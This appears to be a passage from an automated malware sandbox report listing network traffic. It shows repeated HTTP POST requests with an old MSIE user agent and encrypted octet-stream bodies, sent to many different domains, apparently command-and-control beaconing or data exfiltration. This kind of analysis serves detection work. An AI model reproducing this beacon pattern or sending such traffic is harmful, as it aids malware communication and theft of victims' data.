68 63 4c 75 4a 39 4d 50 59 66 65 39 6b 44 70 48 2b 6c 31 6f 33 67 6e 59 69 75 51 70 2b 6e 7a 77 37 2f 71 4e 53 66 53 31 74 78 5a 65 49 52 4b 4a 34 34 57 6c 56 30 30 4b 76 54 69 30 71 33 36 73 6b 6b 51 69 6d 6c 53 41 49 70 6e 54 64 6b 2f 7a 34 58 66 48 4e 6b 45 58 35 4d 62 6a 4a 2b 68 6a 65 6e 42 53 30 79 4c 55 4b 55 39 48 71 35 67 61 44 63 52 53 6b 57 4a 4c 33 6d 72 6e 38 59 49 61 33 69 6d 6d 7a 69 34 57 75 34 59 4d 49 35 4c 6b 73 54 4e 2f 41 6e 6f 49 6f 6e 71 78 4f 71 54 52 66 6d 5a 4f 64 77 4e 41 56 48 79 55 36 77 65 62 6b 54 67 74 2b 4c 4c 38 47 71 44 6e 77 4d 6d 53 4b 65 6e 4e 5a 45 48 6b 63 54 7a 63 47 6a 71 46 6a 77 76 69 35 47 64 32 38 78 67 59 72 61 69 39 67 44 6a 42 62 36 49 4e 62 71 68 42 6c 54 7a 37 63 4b 2f 44 35 6a 39 52 66 65 7a 6a 2b 79 6d 41 68 6c 55 2f 43 62 4d 66 51 6c 32 65 39 71 48 63 2b 31 4f 7a 6c 2b 36 33 2f 69 4d Data Ascii: mVwIjk0PFAlVdZ8pxGgRLwbt5b67iAfj0dyJ2aXQLxD15u7SRu7yg5YfdZT1bz5PhC1LgiRcQvTgbajXsF1s23k9xEGBRQmpziCr6XQlIxYQr8NKDx97mnpSP3g4c6DqhkLb9y7/kAoECSTHUYSFeTnD0Yigj+NhcnCfMxWBlKqDkY7wQ6sDHq3eO9JeiIIvArRZePTTUYCLHGtlJ5jdJvS80tXkd2eqC1m8kC57E2pV4s0QoJJ71DoP4wQ9lx6jQe544oWQvKoR8SZSg3qVqREBGaZM2hcLuJ9MPYfe9kDpH+l1o3gnYiuQp+nzw7/qNSfS1txZeIRKJ44WlV00KvTi0q36skkQimlSAIpnTdk/z4XfHNkEX5MbjJ+hjenBS0yLUKU9Hq5gaDcRSkWJL3mrn8YIa3immzi4Wu4YMI5LksTN/AnoIonqxOqTRfmZOdwNAVHyU6webkTgt+LL8GqDnwMmSKenNZEHkcTzcGjqFjwvi5Gd28xgYrai9gDjBb6INbqhBlTz7cK/D5j9Rfezj+ymAhlU/CbMfQl2e9qHc+1Ozl+63/iM
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 44 6e 34 74 51 45 6e 59 47 51 6d 79 41 4b 37 39 6d 41 55 4e 48 6d 49 76 45 6e 4a 6e 32 78 75 30 6a 52 64 48 38 43 31 65 58 32 64 4e 42 76 72 6e 59 6e 76 4d 43 42 38 64 67 54 47 56 42 67 2f 4e 74 51 4a 72 52 6e 72 4a 4f 50 44 50 32 38 58 71 6c 4c 6e 75 41 6d 61 59 46 53 5a 4f 30 42 78 6f 36 4c 77 61 6d 2b 48 55 55 65 71 46 46 34 38 71 6d 74 44 64 54 62 75 63 6c 4f 74 79 78 50 63 78 70 6f 6a 56 57 4e 72 42 4c 61 49 34 33 43 74 2f 79 57 4d 48 68 37 46 6d 34 4e 6d 6c 57 6c 36 39 31 33 32 4f 56 57 7a 41 79 34 47 79 35 38 35 42 43 6b 2f 6e 36 46 43 4b 76 37 34 75 68 75 63 65 6c 52 48 41 64 71 54 33 48 38 6c 50 56 43 66 63 6c 73 79 59 4a 67 48 2f 69 76 30 33 59 6f 76 76 4b 72 6d 52 32 34 59 45 75 6d 33 72 7a 4e 72 30 5a 48 32 67 4e 41 6c 38 4b 76 6d 50 79 36 61 6d 34 7a 68 77 38 78 48 64 5a 7a 69 78 43 79 72 33 51 6f 2b 64 71 70 6b 31 32 53 4e 54 2f 52 4b 5a 38 37 65 70 53 2f 41 47 49 30 62 69 34 43 62 4c 64 6d 6a 4f 4c 74 4d 48 67 55 58 42 57 6e 58 61 42 4c 6a 35 2b 4f 59 50 61 36 58 55 6d 33 47 37 58 2f 4c 51 61 34 59 2f 4b 65 30 49 38 51 57 62 42 50 32 73 37 59 30 6e 30 61 57 47 32 61 55 4d 7a 46 39 61 67 30 48 61 75 37 79 43 72 2b 47 73 50 31 63 75 61 34 4d 6d 77 4c 66 6f 54 76 44 6d 79 79 6a 70 32 53 67 52 43 53 46 33 37 42 62 71 41 31 6a 61 4b 65 77 39 30 67 6e 43 74 48 7a 78 69 79 49 41 68 58 63 4b 45 36 7a 41 41 2b 46 4a 41 52 73 30 38 41 61 39 48 45 6c 65 32 59 38 70 6c 73 54 43 49 6f 48 54 6e 47 52 76 77 2b 4f 4e 6a 4d 6e 64 34 31 56 50 45 57 6d 44 57 53 35 41 30 6b 73 6b 46 44 52 45 43 42 68 76 73 57 42 48 48 5a 58 4b 30 70 4a 59 4c 72 4a 35 71 68 73 52 45 79 4e 73 74 6c 77 2b 39 32 4e 32 55 44 35 58 54 57 51 4e 63 74 56 67 47 6b 4a 6a 2b 65 36 39 4a 76 59 53 71 57 32 38 49 45 35 6b 4e 67 6e 63 72 6b 50 58 41 59 44 76 4b 30 71 30 4a 4a 51 36 68 6d 4e 71 38 34 33 4d 41 35 59 3d Data Ascii: Dn4tQEnYGQmyAK79mAUNHmIvEnJn2xu0jRdH8C1eX2dNBvrnYnvMCB8dgTGVBg/NtQJrRnrJOPDP28XqlLnuAmaYFSZO0Bxo6Lwam+HUUeqFF48qmtDdTbuclOtyxPcxpojVWNrBLaI43Ct/yWMHh7Fm4NmlWl69132OVWzAy4Gy585BCk/n6FCKv74uhucelRHAdqT3H8lPVCfclsyYJgH/iv03YovvKrmR24YEum3rzNr0ZH2gNAl8KvmPy6am4zhw8xHdZzixCyr3Qo+dqpk12SNT/RKZ87epS/AGI0bi4CbLdmjOLtMHgUXBWnXaBLj5+OYPa6XUm3G7X/LQa4Y/Ke0I8QWbBP2s7Y0n0aWG2aUMzF9ag0Hau7yCr+GsP1cua4MmwLfoTvDmyyjp2SgRCSF37BbqA1jaKew90gnCtHzxiyIAhXcKE6zAA+FJARs08Aa9HEle2Y8plsTCIoHTnGRvw+ONjMnd41VPEWmDWS5A0kskFDRECBhvsWBHHZXK0pJYLrJ5qhsREyNstlw+92N2UD5XTWQNctVgGkJj+e69JvYSqW28IE5kNgncrkPXAYDvK0q0JJQ6hmNq843MA5Y=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 6d 56 77 49 6a 6b 30 50 46 41 6c 56 64 5a 38 70 78 47 67 52 4c 77 62 74 35 62 36 37 69 41 66 6a 30 64 79 4a 32 61 58 51 4c 78 44 31 35 75 37 53 52 75 37 79 67 35 59 66 64 5a 54 31 62 7a 35 50 68 43 31 4c 67 69 52 63 51 76 54 67 62 61 6a 58 73 46 31 73 32 33 6b 39 78 45 47 42 52 51 6d 70 7a 69 43 72 36 58 51 6c 49 78 59 51 72 38 4e 4b 44 78 39 37 6d 6e 70 53 50 33 67 34 63 36 44 71 68 6b 4c 62 39 79 37 2f 6b 41 6f 45 43 53 54 48 55 59 53 46 65 54 6e 44 30 59 69 67 6a 2b 4e 68 63 6e 43 66 4d 78 57 42 6c 4b 71 44 6b 59 37 77 51 36 73 44 48 71 33 65 4f 39 4a 65 69 49 49 76 41 72 52 5a 65 50 54 54 55 59 43 4c 48 47 74 6c 4a 35 6a 64 4a 76 53 38 30 74 58 6b 64 32 65 71 43 31 6d 38 6b 43 35 37 45 32 70 56 34 73 30 51 6f 4a 4a 37 31 44 6f 50 34 77 51 39 6c 78 36 6a 51 65 35 34 34 6f 57 51 76 4b 6f 52 38 53 5a 53 67 33 71 56 71 52 45 42 47 61 5a 4d 32 68 63 4c 75 4a 39 4d 50 59 66 65 39 6b 44 70 48 2b 6c 31 6f 33 67 6e 59 69 75 51 70 2b 6e 7a 77 37 2f 71 4e 53 66 53 31 74 78 5a 65 49 52 4b 4a 34 34 57 6c 56 30 30 4b 76 54 69 30 71 33 36 73 6b 6b 51 69 6d 6c 53 41 49 70 6e 54 64 6b 2f 7a 34 58 66 48 4e 6b 45 58 35 4d 62 6a 4a 2b 68 6a 65 6e 42 53 30 79 4c 55 4b 55 39 48 71 35 67 61 44 63 52 53 6b 57 4a 4c 33 6d 72 6e 38 59 49 61 33 69 6d 6d 7a 69 34 57 75 34 59 4d 49 35 4c 6b 73 54 4e 2f 41 6e 6f 49 6f 6e 71 78 4f 71 54 52 66 6d 5a 4f 64 77 4e 41 56 48 79 55 36 77 65 62 6b 54 67 74 2b 4c 4c 38 47 71 44 6e 77 4d 6d 53 4b 65 6e 4e 5a 45 48 6b 63 54 7a 63 47 6a 71 46 6a 77 76 69 35 47 64 32 38 78 67 59 72 61 69 39 67 44 6a 42 62 36 49 4e 62 71 68 42 6c 54 7a 37 63 4b 2f 44 35 6a 39 52 66 65 7a 6a 2b 79 6d 41 68 6c 55 2f 43 62 4d 66 51 6c 32 65 39 71 48 63 2b 31 4f 7a 6c 2b 36 33 2f 69 4d Data Ascii: mVwIjk0PFAlVdZ8pxGgRLwbt5b67iAfj0dyJ2aXQLxD15u7SRu7yg5YfdZT1bz5PhC1LgiRcQvTgbajXsF1s23k9xEGBRQmpziCr6XQlIxYQr8NKDx97mnpSP3g4c6DqhkLb9y7/kAoECSTHUYSFeTnD0Yigj+NhcnCfMxWBlKqDkY7wQ6sDHq3eO9JeiIIvArRZePTTUYCLHGtlJ5jdJvS80tXkd2eqC1m8kC57E2pV4s0QoJJ71DoP4wQ9lx6jQe544oWQvKoR8SZSg3qVqREBGaZM2hcLuJ9MPYfe9kDpH+l1o3gnYiuQp+nzw7/qNSfS1txZeIRKJ44WlV00KvTi0q36skkQimlSAIpnTdk/z4XfHNkEX5MbjJ+hjenBS0yLUKU9Hq5gaDcRSkWJL3mrn8YIa3immzi4Wu4YMI5LksTN/AnoIonqxOqTRfmZOdwNAVHyU6webkTgt+LL8GqDnwMmSKenNZEHkcTzcGjqFjwvi5Gd28xgYrai9gDjBb6INbqhBlTz7cK/D5j9Rfezj+ymAhlU/CbMfQl2e9qHc+1Ozl+63/iM
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheData Raw: 6d 4b 32 51 6a 57 6b 4c 46 41 6c 5a 33 61 39 47 4f 46 31 41 7a 49 4a 76 6e 57 63 48 33 64 72 71 72 53 78 41 2b 39 46 79 57 68 4f 4c 4f 6b 67 4d 5a 76 58 62 6c 58 78 67 4a 66 6c 4c 38 49 56 70 4c 66 54 42 4b 51 30 4c 56 32 53 73 57 4e 62 51 5a 5a 59 71 4f 48 56 50 48 75 6a 72 68 49 6b 68 42 5a 41 4a 6e 57 6e 6b 66 42 69 4c 78 77 67 67 67 65 46 36 35 71 34 38 72 43 6f 72 59 71 4a 6e 6d 53 30 4a 48 58 6b 79 36 49 73 2b 4e 6f 4f 72 47 74 35 39 46 4f 50 64 32 76 57 68 66 69 57 58 43 4d 46 34 37 78 6d 62 78 45 58 66 32 35 49 57 76 41 63 48 6c 66 6e 75 76 76 6f 41 64 61 76 64 2b 37 46 43 55 67 5a 61 44 62 4f 36 2b 62 6f 43 6f 4d 32 64 53 2b 4c 30 34 69 33 73 5a 5a 7a 58 2b 47 30 69 31 35 68 75 6b 68 53 36 30 73 55 6f 6b 41 73 62 5a 6e 7a 72 76 36 43 39 74 4c 68 59 58 71 75 76 30 61 66 65 4f 33 72 58 53 50 76 31 44 44 61 36 65 61 57 59 6c 66 64 41 2f 69 68 62 53 65 6f 59 6e 4b 39 7a 68 61 73 6f 72 76 50 4d 38 42 45 5a 42 53 71 44 39 73 55 78 62 74 30 54 49 77 38 73 62 65 30 2f 4a 68 58 6a 49 76 72 58 77 74 48 37 75 54 76 6c 4a 68 6a 63 54 75 59 34 4c 67 78 30 47 41 70 34 33 61 46 4e 59 38 45 30 4a 43 69 67 38 76 5a 4b 7a 6f 53 39 36 33 67 47 4c 67 64 51 74 35 53 69 62 74 6d 35 58 36 43 47 47 34 49 57 52 42 71 32 42 59 52 6f 4d 7a 59 36 39 48 4c 76 44 2f 71 2f 51 79 31 65 32 68 70 6f 35 30 36 7a 44 76 49 2f 66 65 30 79 2f 42 54 7a 38 32 4c 7a 74 35 74 53 44 58 79 48 4f 73 35 4f 63 4b 34 61 4b 70 4c 4b 6b 7a 64 36 68 66 5a 30 71 6e 4e 30 64 72 54 30 4e 44 4e 58 66 45 34 2b 45 6f 55 63 38 71 6f 56 56 56 6d 51 48 45 59 43 6d 45 65 2b 77 73 56 55 43 59 71 72 79 31 6c 50 68 51 38 34 55 4f 53 70 30 7a 69 48 44 2f 45 37 2b 62 72 32 71 37 55 65 32 2f 58 33 76 65 4a 41 77 70 49 3d Data Ascii: mK2QjWkLFAlZ3a9GOF1AzIJvnWcH3drqrSxA+9FyWhOLOkgMZvXblXxgJflL8IVpLfTBKQ0LV2SsWNbQZZYqOHVPHujrhIkhBZAJnWnkfBiLxwgggeF65q48rCorYqJnmS0JHXky6Is+NoOrGt59FOPd2vWhfiWXCMF47xmbxEXf25IWvAcHlfnuvvoAdavd+7FCUgZaDbO6+boCoM2dS+L04i3sZZzX+G0i15hukhS60sUokAsbZnzrv6C9tLhYXquv0afeO3rXSPv1DDa6eaWYlfdA/ihbSeoYnK9zhasorvPM8BEZBSqD9sUxbt0TIw8sbe0/JhXjIvrXwtH7uTvlJhjcTuY4Lgx0GAp43aFNY8E0JCig8vZKzoS963gGLgdQt5Sibtm5X6CGG4IWRBq2BYRoMzY69HLvD/q/Qy1e2hpo506zDvI/fe0y/BTz82Lzt5tSDXyHOs5OcK4aKpLKkzd6hfZ0qnN0drT0NDNXfE4+EoUc8qoVVVmQHEYCmEe+wsVUCYqry1lPhQ84UOSp0ziHD/E7+br2q7Ue2/X3veJAwpI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 2b 57 69 79 73 2b 66 6f 4a 51 6c 50 56 4e 43 7a 6c 74 47 32 6a 4c 44 76 6b 61 52 64 34 39 58 79 43 77 76 4a 51 71 55 2f 6f 6f 56 4c 71 35 65 31 77 51 74 6e 69 6f 6b 64 67 48 2f 4c 57 42 42 4a 55 35 56 79 37 70 65 41 36 4f 6b 57 4f 62 6e 59 71 75 64 49 58 37 6c 32 43 43 68 6d 38 44 67 70 32 70 6a 7a 61 78 53 6d 45 44 66 4b 37 6e 58 77 6d 35 43 58 6a 6f 6f 2f 51 56 6b 55 59 4e 59 37 55 78 72 55 6c 54 2b 49 59 2f 74 76 39 76 67 6f 51 4a 38 74 57 77 6a 73 34 64 58 74 79 39 73 2b 49 31 6c 6c 50 70 49 63 43 4f 37 64 4c 62 4a 53 36 54 61 32 2b 42 56 33 37 37 34 59 6a 50 66 36 71 56 4e 5a 68 6f 6e 32 41 75 61 64 59 6e 72 53 47 79 61 79 7a 54 31 2b 57 6b 4d 33 73 33 6b 46 45 4d 34 51 65 6f 6a 2f 74 54 59 51 45 2b 59 56 4b 43 71 74 74 76 49 4a 4f 6e 55 74 69 30 41 44 78 4c 50 67 6d 2f 4b 34 51 53 56 59 30 30 52 79 46 35 54 39 43 6a 51 7a 62 4e 32 37 56 36 4b 76 4b 71 75 74 79 58 4d 76 34 63 76 31 2f 41 6f 55 59 30 66 62 2b 33 49 38 42 4e 65 49 53 38 57 59 39 78 77 30 4a 45 6a 73 59 59 72 59 76 33 79 34 33 44 41 32 6a 35 69 62 78 67 2b 71 32 72 33 55 71 47 48 46 37 6e 49 30 59 45 52 61 70 33 6e 45 68 35 4a 78 6f 58 57 38 57 66 79 39 72 34 4e 4d 44 51 4f 6c 61 4b 77 4b 53 31 69 58 4e 75 66 47 48 72 4b 42 77 54 68 53 56 51 7a 54 77 68 79 78 50 51 42 33 47 6d 73 59 2f 42 69 53 50 77 2f 76 36 75 33 46 61 42 6c 47 2f 56 61 2f 49 34 47 4a 76 4e 4d 66 63 43 58 55 4f 64 64 4b 32 2b 41 5a 52 61 69 41 4c 39 6a 65 67 2f 2b 6d 7a 38 41 67 4a 42 66 59 33 58 43 59 34 42 42 78 61 6f 74 73 53 6d 7a 32 39 4f 4a 56 4d 7a 62 66 75 43 48 72 70 7a 57 2f 52 53 59 4e 72 4d 58 33 65 53 50 72 74 37 33 6a 65 53 38 75 70 4e 37 46 53 74 70 65 77 6f 68 70 39 47 45 3d Data Ascii: +Wiys+foJQlPVNCzltG2jLDvkaRd49XyCwvJQqU/ooVLq5e1wQtniokdgH/LWBBJU5Vy7peA6OkWObnYqudIX7l2CChm8Dgp2pjzaxSmEDfK7nXwm5CXjoo/QVkUYNY7UxrUlT+IY/tv9vgoQJ8tWwjs4dXty9s+I1llPpIcCO7dLbJS6Ta2+BV3774YjPf6qVNZhon2AuadYnrSGyayzT1+WkM3s3kFEM4Qeoj/tTYQE+YVKCqttvIJOnUti0ADxLPgm/K4QSVY00RyF5T9CjQzbN27V6KvKqutyXMv4cv1/AoUY0fb+3I8BNeIS8WY9xw0JEjsYYrYv3y43DA2j5ibxg+q2r3UqGHF7nI0YERap3nEh5JxoXW8Wfy9r4NMDQOlaKwKS1iXNufGHrKBwThSVQzTwhyxPQB3GmsY/BiSPw/v6u3FaBlG/Va/I4GJvNMfcCXUOddK2+AZRaiAL9jeg/+mz8AgJBfY3XCY4BBxaotsSmz29OJVMzbfuCHrpzW/RSYNrMX3eSPrt73jeS8upN7FStpewohp9GE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 6b 34 2b 50 73 6e 58 66 4a 51 6d 63 53 56 73 6d 33 4f 72 51 6e 47 36 37 4e 6c 49 44 38 4f 39 53 65 64 4e 63 77 54 46 5a 62 6c 6c 38 2b 74 6a 50 78 79 32 39 4a 4d 69 46 30 66 30 69 70 66 75 65 79 63 44 42 2b 46 69 67 77 51 52 58 44 37 67 53 6d 36 2f 4c 37 43 30 57 75 43 64 34 47 47 30 4d 53 4c 76 64 71 58 71 6d 42 2f 67 51 30 67 75 43 78 6b 6f 58 62 70 42 56 78 65 4a 64 44 78 2b 4a 4b 45 75 62 4e 7a 77 4b 58 79 7a 7a 32 78 51 61 73 47 62 57 57 4e 53 51 5a 31 33 2b 4d 48 6f 78 35 53 69 31 58 73 34 52 4f 61 72 58 6e 31 39 55 54 73 6c 42 65 59 35 63 50 38 42 4d 30 63 63 72 58 58 54 64 67 78 6f 65 2b 57 51 44 37 4b 70 36 37 4f 6d 2f 6c 6c 5a 6e 4f 32 77 70 64 73 65 4e 38 45 43 74 65 4e 57 61 6f 61 39 51 32 35 49 46 72 6e 4f 6b 39 4d 55 6d 42 6d 4d 65 69 42 4e 57 63 31 33 6a 61 61 61 59 79 31 71 31 61 6b 69 33 4d 32 4c 69 49 6f 72 43 56 62 4a 42 37 65 79 78 76 57 59 47 49 37 4e 61 4b 4f 54 61 2f 35 37 59 7a 69 32 5a 44 55 5a 4f 37 4c 51 53 33 59 59 59 42 6f 54 37 53 45 48 6c 34 66 75 4c 52 68 58 75 66 2f 6a 5a 6d 65 6b 37 70 49 52 68 55 4a 36 62 6c 57 4a 4c 44 42 77 36 42 54 4e 61 53 36 6e 73 55 55 75 6c 32 49 37 34 65 68 46 64 6d 54 51 37 4c 55 51 35 61 4b 33 50 36 57 4d 47 47 70 66 44 6b 2f 54 76 5a 4b 42 67 72 64 4c 47 75 52 50 53 6a 41 35 66 46 51 35 70 4e 74 54 2b 66 66 4c 68 56 6e 6e 47 52 44 4d 6e 7a 5a 61 4e 6d 4d 45 7a 32 4a 69 51 44 56 51 75 6d 71 76 71 48 35 4e 78 6b 4d 30 75 6a 42 49 44 6b 4b 32 5a 72 6c 6b 69 50 45 4f 4c 6f 39 55 55 35 50 59 55 4e 49 72 50 4a 38 48 47 57 77 53 77 4a 51 79 2b 77 4d 33 37 45 48 37 44 78 79 72 5a 50 38 69 48 72 65 72 33 6b 2b 2b 48 76 77 6c 5a 31 70 39 51 36 30 50 47 5a 4c 76 68 56 31 6b 74 Data Ascii: k4+PsnXfJQmcSVsm3OrQnG67NlID8O9SedNcwTFZbll8+tjPxy29JMiF0f0ipfueycDB+FigwQRXD7gSm6/L7C0WuCd4GG0MSLvdqXqmB/gQ0guCxkoXbpBVxeJdDx+JKEubNzwKXyzz2xQasGbWWNSQZ13+MHox5Si1Xs4ROarXn19UTslBeY5cP8BM0ccrXXTdgxoe+WQD7Kp67Om/llZnO2wpdseN8ECteNWaoa9Q25IFrnOk9MUmBmMeiBNWc13jaaaYy1q1aki3M2LiIorCVbJB7eyxvWYGI7NaKOTa/57Yzi2ZDUZO7LQS3YYYBoT7SEHl4fuLRhXuf/jZmek7pIRhUJ6blWJLDBw6BTNaS6nsUUul2I74ehFdmTQ7LUQ5aK3P6WMGGpfDk/TvZKBgrdLGuRPSjA5fFQ5pNtT+ffLhVnnGRDMnzZaNmMEz2JiQDVQumqvqH5NxkM0ujBIDkK2ZrlkiPEOLo9UU5PYUNIrPJ8HGWwSwJQy+wM37EH7DxyrZP8iHrer3k++HvwlZ1p9Q60PGZLvhV1kt
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 33 4d 54 47 50 2f 4c 55 47 51 6b 64 74 41 42 43 4a 53 38 35 79 66 57 32 31 4f 54 43 4d 79 6c 48 52 75 6f 6a 53 6d 78 53 6d 4f 63 4e 71 56 6c 6b 64 47 39 5a 37 6d 73 4d 44 52 43 56 52 47 48 62 56 44 76 6c 68 6e 49 65 31 4b 76 35 36 38 39 4f 6c 65 31 70 75 2b 2b 4e 75 45 36 39 58 45 63 73 4f 76 6b 63 62 4d 48 2f 46 6c 42 67 2f 32 38 6f 6d 5a 37 73 52 49 36 47 76 6e 2f 61 51 52 35 42 2f 67 69 53 68 69 54 75 59 67 43 77 79 68 50 61 38 31 46 6c 49 6b 2b 63 77 48 70 5a 70 49 35 57 5a 46 36 38 68 45 49 72 45 32 47 4e 69 6b 4a 51 69 66 2b 46 6c 73 45 48 59 61 75 77 77 6a 30 44 6c 38 76 59 6d 62 67 6a 68 43 55 77 4d 73 52 59 59 76 77 58 33 31 53 38 44 48 6c 46 43 56 64 49 71 6d 62 43 51 32 4c 4d 65 65 56 62 50 6d 54 35 33 70 36 4a 78 32 33 47 2b 5a 43 4d 71 74 5a 79 2f 4b 36 63 56 6b 48 63 47 2f 64 33 51 76 4c 31 48 62 32 71 79 63 6b 4c 33 47 2b 69 73 69 38 61 4b 41 4e 5a 33 61 48 77 61 6a 36 51 69 70 2b 30 6c 39 47 58 41 43 72 4d 4b 39 68 30 44 67 34 38 4c 6f 50 6a 6e 37 4e 67 58 50 38 6e 38 4f 61 35 77 57 65 4c 6f 41 2f 45 47 43 4b 77 52 6e 77 75 51 74 79 4f 69 52 42 33 6e 6a 79 67 4d 39 2f 4a 4a 47 52 34 6d 56 74 39 71 79 37 47 4e 33 2f 7a 4a 57 64 37 72 65 52 43 61 39 4f 4a 57 42 44 41 6e 43 4b 44 47 34 38 72 58 45 31 2b 76 4e 63 53 5a 6e 65 6b 47 78 37 59 53 78 65 6c 61 56 32 35 69 4d 74 74 7a 66 79 50 72 68 51 55 62 51 49 53 43 35 79 4f 57 42 62 75 61 6f 63 54 51 76 41 46 5a 62 4d 49 44 67 53 41 53 33 4c 42 55 50 63 62 6f 43 5a 77 68 6f 7a 4a 72 4b 65 55 52 6e 6d 6e 4f 75 6e 32 65 6b 2b 32 49 39 52 30 77 33 72 48 48 49 33 52 6d 35 41 64 63 4b 46 47 35 33 4e 4f 47 45 4b 63 34 41 71 37 54 7a 67 45 41 53 54 53 74 67 6a 64 66 2f 37 50 47 69 6e 2f 57 67 45 4d Data Ascii: 3MTGP/LUGQkdtABCJS85yfW21OTCMylHRuojSmxSmOcNqVlkdG9Z7msMDRCVRGHbVDvlhnIe1Kv5689Ole1pu++NuE69XEcsOvkcbMH/FlBg/28omZ7sRI6Gvn/aQR5B/giShiTuYgCwyhPa81FlIk+cwHpZpI5WZF68hEIrE2GNikJQif+FlsEHYauwwj0Dl8vYmbgjhCUwMsRYYvwX31S8DHlFCVdIqmbCQ2LMeeVbPmT53p6Jx23G+ZCMqtZy/K6cVkHcG/d3QvL1Hb2qyckL3G+isi8aKANZ3aHwaj6Qip+0l9GXACrMK9h0Dg48LoPjn7NgXP8n8Oa5wWeLoA/EGCKwRnwuQtyOiRB3njygM9/JJGR4mVt9qy7GN3/zJWd7reRCa9OJWBDAnCKDG48rXE1+vNcSZnekGx7YSxelaV25iMttzfyPrhQUbQISC5yOWBbuaocTQvAFZbMIDgSAS3LBUPcboCZwhozJrKeURnmnOun2ek+2I9R0w3rHHI3Rm5AdcKFG53NOGEKc4Aq7TzgEASTStgjdf/7PGin/WgEM
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 47 47 45 58 56 61 45 6d 4b 77 6c 38 66 68 5a 4f 41 41 2b 39 71 6e 71 48 35 73 43 66 31 46 58 71 5a 64 39 65 74 32 37 35 50 4b 2b 54 61 69 61 4f 58 4e 33 63 56 2b 49 44 75 2f 44 39 44 77 39 48 77 55 79 43 7a 6d 46 73 35 69 72 5a 52 58 53 4c 58 63 33 4b 52 33 70 64 48 4a 2f 42 63 49 64 53 75 39 34 61 62 42 30 2f 58 41 4c 5a 64 59 52 7a 65 49 4c 57 35 43 67 68 72 61 44 34 51 77 6c 42 67 6c 35 33 4a 43 6c 65 7a 37 54 55 39 59 31 4a 70 6f 79 6a 54 66 39 78 45 39 47 62 2f 75 43 69 65 62 49 4a 67 69 33 63 45 58 64 4d 4a 51 30 55 6a 6e 6c 4c 49 63 36 52 51 65 6b 49 65 4c 53 58 52 41 62 31 67 55 71 36 62 2b 44 30 52 6d 72 2b 4a 6a 79 49 44 66 48 32 6e 47 33 39 78 72 58 65 73 67 73 35 51 7a 31 36 51 44 75 43 32 44 66 55 45 78 46 56 4e 31 48 64 57 42 44 59 74 46 6f 32 79 79 7a 4b 71 6e 72 4b 70 55 58 50 47 43 33 54 76 2b 57 42 62 50 74 43 67 79 5a 33 71 4e 6f 6e 78 4b 53 4e 51 4d 4e 4d 4d 49 53 31 48 4c 4a 33 50 6e 6f 78 44 74 51 36 5a 44 41 43 5a 6a 68 74 52 4b 49 77 32 39 59 5a 36 65 2f 52 48 64 31 6d 62 4f 56 48 53 2b 4c 75 37 45 70 5a 31 53 46 73 78 2f 62 79 62 72 2b 6e 71 5a 31 47 35 54 41 71 51 65 71 6b 34 4f 70 41 53 4e 30 37 46 71 76 51 68 61 41 4c 39 36 38 50 47 46 6c 61 71 42 30 6e 4f 67 55 72 56 2f 4c 56 6d 6e 35 6d 53 69 6f 70 68 2b 4e 6f 47 68 75 78 54 79 48 6d 2f 47 4b 72 77 64 38 2b 38 41 6f 30 4f 77 56 66 61 30 62 48 6c 51 74 57 49 76 78 79 4a 4a 2b 55 44 44 43 34 78 79 2b 2f 76 30 39 4e 6a 47 58 44 73 77 76 4b 77 48 46 35 33 39 6b 63 4f 56 68 59 4f 68 6d 4d 44 50 66 4a 6a 4d 76 4d 68 35 48 4a 71 58 71 41 57 35 51 68 74 37 48 71 38 66 4d 54 79 52 6e 77 6d 78 55 74 43 58 64 78 78 33 34 44 64 32 55 79 49 48 34 39 79 78 74 78 31 62 71 66 65 34 49 70 4f 34 73 42 6f 37 30 3d Data Ascii: GGEXVaEmKwl8fhZOAA+9qnqH5sCf1FXqZd9et275PK+TaiaOXN3cV+IDu/D9Dw9HwUyCzmFs5irZRXSLXc3KR3pdHJ/BcIdSu94abB0/XALZdYRzeILW5CghraD4QwlBgl53JClez7TU9Y1JpoyjTf9xE9Gb/uCiebIJgi3cEXdMJQ0UjnlLIc6RQekIeLSXRAb1gUq6b+D0Rmr+JjyIDfH2nG39xrXesgs5Qz16QDuC2DfUExFVN1HdWBDYtFo2yyzKqnrKpUXPGC3Tv+WBbPtCgyZ3qNonxKSNQMNMMIS1HLJ3PnoxDtQ6ZDACZjhtRKIw29YZ6e/RHd1mbOVHS+Lu7EpZ1SFsx/bybr+nqZ1G5TAqQeqk4OpASN07FqvQhaAL968PGFlaqB0nOgUrV/LVmn5mSioph+NoGhuxTyHm/GKrwd8+8Ao0OwVfa0bHlQtWIvxyJJ+UDDC4xy+/v09NjGXDswvKwHF539kcOVhYOhmMDPfJjMvMh5HJqXqAW5Qht7Hq8fMTyRnwmxUtCXdxx34Dd2UyIH49yxtx1bqfe4IpO4sBo70=
